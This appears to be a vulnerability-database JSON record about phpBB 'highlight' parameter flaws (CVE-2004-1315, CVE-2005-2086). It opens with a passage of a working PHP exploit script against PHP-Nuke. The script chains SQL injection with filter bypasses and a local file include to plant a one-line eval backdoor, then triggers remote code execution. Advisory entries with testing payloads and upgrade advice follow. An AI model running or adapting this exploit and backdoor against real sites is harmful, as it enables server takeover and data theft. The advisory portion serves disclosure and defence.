$backdoor_installer='function OpenTable(){} function themeheader(){} $db->sql_query(\"update \".$prefix.\"_config set Default_Theme='.$sex->charEncode($theme[0]).', display_errors=0\");';\n //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.\n $backdoor='get_magic_quotes_gpc()?eval(stripslashes(\".chr(36).\"_GET[\".chr(34).\"e\".chr(34).\"])):eval(\".chr(36).\"_GET[\".chr(34).\"e\".chr(34).\"])';\n //Install the backdoor in a relitive directory.\n $backdoor_installer.='file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].dirname($_SERVER[\"SCRIPT_NAME\"]).\"/frontend.php\",chr(60).\"?php '.$backdoor.'?\".chr(62));';\n //charEncode is used to bypass XSS filters.\n\t //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php\n $http->postdata=\"chng_uid=\".urlencode(\"' union/**/ select \".$sex->charEncode(\"<?php\").\",'\".$backdoor_installer.\"',\".$sex->charEncode(\"?>\").\",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1\");\n $http->send($attack_url.\"/admin.php?op=modifyUser\");\n sleep(2);\n //local file include vulnerablity to execute /tmp/theme.php\n $http->postdata=\"xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes\";\n $http->send($attack_url.\"/admin.php\");\n sleep(2);\n $http->postdata='';\n //Fire off a get request to trigger the uploaded php file using LFI\n $http->send($attack_url);\n sleep(2);\n //Try the LFI again, just in case.\n $http->send($attack_url.\"/admin.php\");\n }\n sleep(2);\n //test if the backdoor works, try and clean up after the exploit.\n $test_backdoor=$http->send($attack_url.\"/frontend.php?e=\".urlencode(\"echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');\"));\n if(strstr($test_backdoor,\"31337\")){\n print \"Remote Code execution tested successfully:\\n\".$attack_url.\"/frontend.php?e=phpinfo()\".urlencode(';').\"\\n\";\n }else{\n print \"Backdoor install failed!\\n\";\n }\n }else{\n ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.\n print \"PHP-Nuke 7 detected.\\n\";\n $http->postdata=\"\";//send get requests.\n //Fire off a check for CVE-2004-1315, phpbb maybe installed. \n //This is more like the oringal CVE-2004-1315: %2527.printf(20041315).%2527\n //php-nuke was not vulnerable to this because of mainfile line 50: \\([^>]*\"?[^)]*\\)\n //to byapss this check double urlencode the parren () %2527.printf%252820041315%2529.%2527\n $try_exploit=$http->send($attack_url.\"/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527\");\n //if the exploit didn't work, then we might have to enable phpbb and populate it.\n if(!strstr($try_exploit,\"20041315\")){\n //Enalbe PHPBB\n $http->send($attack_url.\"/admin.php?op=module_status&mid=22&active=1\");\n //create a new category for phpbb\n $http->postdata=\"mode=addcat&categoryname=test&addcategory=Create+new+category\";\n $t=$http->send($attack_url.\"/modules/Forums/admin/admin_forums.php\");\n //ipban.php\n sleep(2);\n //create a new form in the new category\n $http->postdata=\"forumname%5B1%5D=t&addforum%5B1%5D=Create+new+forum&categoryname=test\";\n $t=$http->send($attack_url.\"/modules/Forums/admin/admin_forums.php?\");\n $http->postdata=\"forumname=t&forumdesc=t&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create+new+forum\";\n $http->send($attack_url.\"/modules/Forums/admin/admin_forums.php?\");\n //create a new topic in the new form\n $http->postdata=\"username=t&subject=t&addbbcode18=%23444444&addbbcode20=12&helpbox=Insert+URL%3A+%5Burl%5Dhttp%3A%2F%2Furl%5B%2Furl%5D+or+%5Burl%3Dhttp%3A%2F%2Furl%5DURL+text%5B%2Furl%5D++%28alt%2Bw%29&message=test&mode=newtopic&f=1&post=Submit\";\n $http->send($attack_url.\"/modules.php?name=Forums&file=posting\");\n //ipban.php\n sleep(2);\n //access the first topic.\n $http->postdata=\"\";\n //Check to see if any of the first 10 topics are exploitable.\n for($t=1;$t<10&&!strstr($try_exploit,\"20041315\");$t++){\n //Fire off a check for CVE-2004-1315.\n $try_exploit=$http->send($attack_url.\"/modules.php?name=Forums&file=viewtopic&t=\".$t.\"&highlight=%2527.printf%252820041315%2529.%2527\");\n }\n }\n //Check if we where able to hit CVE-2004-1315.\n if(strstr($try_exploit,\"20041315\")){\n print(\"Remote Code execution tested successfully:\\n\".$attack_url.\"/modules.php?name=Forums&file=viewtopic&t=\".--$t.\"&highlight=%2527.phpinfo%2528%2529.%2527\\nThis is a Doulbe urlencode()\\n\");\n }else{\n print(\"Remote code execution has failed!\\n\");\n }\n }\n}\nmain();\n?>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2004-1315"], "edition": 1, "description": "## Vulnerability Description\nphpBB contains a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject or manipulate SQL queries.\n## Solution Description\nUpgrade to version 2.0.11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nphpBB contains a flaw that will allow a remote attacker to inject arbitrary SQL code. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject or manipulate SQL queries.\n## References:\nVendor URL: http://www.phpbb.com\nVendor Specific Solution URL: http://www.phpbb.com/phpBB/viewtopic.php?t=240513\nUS-CERT Cyber Security Alert: TA04-356A\nSecurity Tracker: 1012647\n[Secunia Advisory ID:13239](https://secuniaresearch.flexerasoftware.com/advisories/13239/)\nOther Advisory URL: http://securityresponse.symantec.com/avcenter/venc/data/perl.santy.html\nOther Advisory URL: http://us.mcafee.com/virusInfo/default.asp?id=3Ddescription&virus_k=3D130=471\nOther Advisory URL: http://www.howdark.com/index.php?o=phpbb_v2010_highlightinjection.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-11/0231.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-11/0368.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-11/0241.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-11/0252.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-11/0179.html\nKeyword: Santy worm\nISS X-Force ID: 18052\nGeneric Informational URL: http://www.f-secure.com/v-descs/santy_a.shtml\nGeneric Exploit URL: http://www.securitylab.ru/_Article_Images/2004/11/phpbb.php.txt\n[CVE-2004-1315](https://vulners.com/cve/CVE-2004-1315)\nCERT VU: 497400\n", "modified": "2004-11-12T10:03:40", "published": "2004-11-12T10:03:40", "href": "https://vulners.com/osvdb/OSVDB:11719", "id": "OSVDB:11719", "title": "phpBB viewtopic.php highlight Parameter SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-2086"], "edition": 1, "description": "## Solution Description\nUpgrade to version 2.0.16 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Manual Testing Notes\nhttp://[victim]/viewtopic.php?p=postnum&highlight='.die(omghax).'\n## References:\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200507-03.xml)\nSecurity Tracker: 1014320\n[Secunia Advisory ID:15845](https://secuniaresearch.flexerasoftware.com/advisories/15845/)\nOther Advisory URL: http://www.phpbb.com/phpBB/viewtopic.php?t=302011\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-06/0373.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0239.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0256.html\nGeneric Exploit URL: http://archives.neohapsis.com/archives/fulldisclosure/2005-06/0385.html\nGeneric Exploit URL: http://www.securiteam.com/exploits/5QP0X00G0C.html\n[CVE-2005-2086](https://vulners.com/cve/CVE-2005-2086)\n", "modified": "2005-06-28T07:55:10", "published": "2005-06-28T07:55:10", "href": "https://vulners.com/osvdb/OSVDB:17613", "id": "OSVDB:17613", "title": "phpBB viewtopic.php Highlighting Feature Arbitrary PHP Code Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2086"], "description": "Added: 12/28/2005 \nCVE: [CVE-2005-2086](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2086>) \nBID: [14086](<http://www.securityfocus.com/bid/14086>) \nOSVDB: [17613](<http://www.osvdb.org/17613>) \n\n\n### Background\n\n[phpBB](<http://www.phpbb.com>) is an open-source bulletin board package written in PHP. \n\n### Problem\n\nThis is a variant of an older vulnerability which allows remote command execution by requesting `**viewtopic.php**` with a specially crafted `**highlight**` parameter. \n\n### Resolution\n\n[Upgrade](<http://www.phpbb.com/downloads.php>) to the latest version of phpBB. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2005-06/0256.html> \n \n\n", "edition": 1, "modified": "2005-12-28T00:00:00", "published": "2005-12-28T00:00:00", "id": "SAINT:2DD650797569B41E89BD6D85DC32071B", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/phpbb_highlight", "type": "saint", "title": "phpBB viewtopic.php highlight parameter vulnerability", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T17:19:52", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2086"], "edition": 2, "description": "Added: 12/28/2005 \nCVE: [CVE-2005-2086](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2086>) \nBID: [14086](<http://www.securityfocus.com/bid/14086>) \nOSVDB: [17613](<http://www.osvdb.org/17613>) \n\n\n### Background\n\n[phpBB](<http://www.phpbb.com>) is an open-source bulletin board package written in PHP. \n\n### Problem\n\nThis is a variant of an older vulnerability which allows remote command execution by requesting `**viewtopic.php**` with a specially crafted `**highlight**` parameter. \n\n### Resolution\n\n[Upgrade](<http://www.phpbb.com/downloads.php>) to the latest version of phpBB. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2005-06/0256.html> \n \n\n", "modified": "2005-12-28T00:00:00", "published": "2005-12-28T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/phpbb_highlight", "id": "SAINT:1581160088DF8510D885994590AA81C1", "type": "saint", "title": "phpBB viewtopic.php highlight parameter vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2086"], "description": "Added: 12/28/2005 \nCVE: [CVE-2005-2086](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2086>) \nBID: [14086](<http://www.securityfocus.com/bid/14086>) \nOSVDB: [17613](<http://www.osvdb.org/17613>) \n\n\n### Background\n\n[phpBB](<http://www.phpbb.com>) is an open-source bulletin board package written in PHP. \n\n### Problem\n\nThis is a variant of an older vulnerability which allows remote command execution by requesting `**viewtopic.php**` with a specially crafted `**highlight**` parameter. \n\n### Resolution\n\n[Upgrade](<http://www.phpbb.com/downloads.php>) to the latest version of phpBB. \n\n### References\n\n<http://archives.neohapsis.com/archives/bugtraq/2005-06/0256.html> \n \n\n", "edition": 4, "modified": "2005-12-28T00:00:00", "published": "2005-12-28T00:00:00", "id": "SAINT:48B2DE64370DD3616AD545A020414F16", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/phpbb_highlight", "title": "phpBB viewtopic.php highlight parameter vulnerability", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2019-05-29T17:19:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2086"], "description": "**Name**| phpbb_highlight \n---|--- \n**CVE**| CVE-2005-2086 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| phpBB Highlight \n**Notes**| CVSS: 7.5 \nRepeatability: Infinite \nVENDOR: phpbb.com \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-2086 \nCVE Name: CVE-2005-2086 \n\n", "edition": 2, "modified": "2005-07-05T04:00:00", "published": "2005-07-05T04:00:00", "id": "PHPBB_HIGHLIGHT", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/phpbb_highlight", "type": "canvas", "title": "Immunity Canvas: PHPBB_HIGHLIGHT", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2086"], "description": "phpBB viewtopic.php RCE\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2012-01-26T00:00:00", "id": "E-6", "href": "", "type": "dsquare", "title": "Phpbb RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
